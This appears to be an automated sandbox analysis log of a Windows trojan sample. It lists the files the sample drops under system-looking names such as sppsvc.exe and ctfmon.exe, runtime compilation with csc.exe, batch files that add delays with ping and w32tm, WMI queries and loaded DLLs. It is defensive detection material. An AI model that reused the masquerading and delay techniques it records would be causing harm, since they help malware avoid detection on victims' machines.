Source: TDdwNhXdQzDImnznNSm.exe1.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: sppsvc.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winEXE@75/109@2/1

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe

File created: C:\Program Files (x86)\msecache\TDdwNhXdQzDImnznNSm.exe

Jump to behavior

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe

File created: C:\Users\user\Desktop\lHNctDZP.log

Jump to behavior

Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7992:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2848:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2468:120:WilError_03
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-9i5llWSDsSpUTw8pYfrW
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7380:120:WilError_03

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe

File created: C:\Users\user\AppData\Local\Temp\xml2dols

Jump to behavior

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\CS5lFm0nOf.bat"

Source: VIyu4dC9CU.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: VIyu4dC9CU.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Recovery\ctfmon.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: VIyu4dC9CU.exe	Virustotal: Detection: 54%
Source: VIyu4dC9CU.exe	ReversingLabs: Detection: 83%

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe

File read: C:\Users\user\Desktop\VIyu4dC9CU.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\VIyu4dC9CU.exe "C:\Users\user\Desktop\VIyu4dC9CU.exe"
Source: unknown	Process created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xml2dols\xml2dols.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES4065.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC6CCC923AD8024E05BABB42F84D362A8A.TMP"
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gsjdpjdw\gsjdpjdw.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES42D6.tmp" "c:\Windows\System32\CSCF1A5C7715E64605B8685523D04CDF88.TMP"
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\CS5lFm0nOf.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\ctfmon.exe "C:\Recovery\ctfmon.exe"
Source: unknown	Process created: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe "C:\Program Files (x86)\reference assemblies\sppsvc.exe"
Source: C:\Recovery\ctfmon.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zsJdcY9yPm.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\reference assemblies\sppsvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe "C:\Program Files (x86)\reference assemblies\sppsvc.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dxSYZSKoEG.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown	Process created: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe "C:\Program Files (x86)\msecache\TDdwNhXdQzDImnznNSm.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\ctfmon.exe "C:\Recovery\ctfmon.exe"
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\msecache\TDdwNhXdQzDImnznNSm.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe "C:\Program Files (x86)\msecache\TDdwNhXdQzDImnznNSm.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe "C:\Program Files (x86)\reference assemblies\sppsvc.exe"
Source: unknown	Process created: C:\Recovery\ctfmon.exe "C:\Recovery\ctfmon.exe"
Source: unknown	Process created: C:\Users\user\Desktop\VIyu4dC9CU.exe "C:\Users\user\Desktop\VIyu4dC9CU.exe"
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\Desktop\VIyu4dC9CU.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\VIyu4dC9CU.exe C:\Users\user\Desktop\VIyu4dC9CU.exe
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7z2CYqkT7L.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown	Process created: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe "C:\Program Files (x86)\reference assemblies\sppsvc.exe"
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\reference assemblies\sppsvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe "C:\Program Files (x86)\reference assemblies\sppsvc.exe"
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yFJPVaLwHB.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xml2dols\xml2dols.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gsjdpjdw\gsjdpjdw.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\CS5lFm0nOf.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES4065.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC6CCC923AD8024E05BABB42F84D362A8A.TMP"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES42D6.tmp" "c:\Windows\System32\CSCF1A5C7715E64605B8685523D04CDF88.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\ctfmon.exe "C:\Recovery\ctfmon.exe"	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zsJdcY9yPm.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\ctfmon.exe "C:\Recovery\ctfmon.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe "C:\Program Files (x86)\reference assemblies\sppsvc.exe"
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dxSYZSKoEG.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe "C:\Program Files (x86)\reference assemblies\sppsvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe "C:\Program Files (x86)\msecache\TDdwNhXdQzDImnznNSm.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\VIyu4dC9CU.exe C:\Users\user\Desktop\VIyu4dC9CU.exe
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7z2CYqkT7L.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe "C:\Program Files (x86)\reference assemblies\sppsvc.exe"
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yFJPVaLwHB.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
